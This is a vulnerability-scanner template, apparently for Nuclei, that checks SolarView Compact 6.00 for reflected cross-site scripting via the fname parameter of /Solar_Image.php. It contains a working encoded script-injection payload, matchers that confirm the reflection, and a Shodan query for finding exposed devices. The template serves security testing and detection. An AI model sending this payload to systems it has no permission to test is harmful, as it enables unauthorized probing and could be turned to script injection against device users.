44 lines
1.3 KiB
YAML
44 lines
1.3 KiB
YAML
id: solarview-compact-xss
|
|
|
|
info:
|
|
name: SolarView Compact 6.00 - Cross-Site Scripting
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: |
|
|
SolarView Compact 6.00 contains a cross-site scripting vulnerability via fname at /Solar_Image.php.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50968
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
|
cvss-score: 7.2
|
|
cwe-id: CWE-79
|
|
cpe: cpe:2.3:h:contec:solarview_compact:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.html:"SolarView Compact"
|
|
product: solarview_compact
|
|
vendor: contec
|
|
tags: xss,solarview,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'value="test"><script>alert(document.domain)</script>">'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a0046304402206ad8d71d69198432980c55c77c0b94f27bcf925a2aca029340240c227e43a639022049acd1270d108a8747d91caaf6bd99989f28ccfa6f3d6ffc2c9e6f4f07ace41a:922c64590222798bb761d5b6d8e72950 |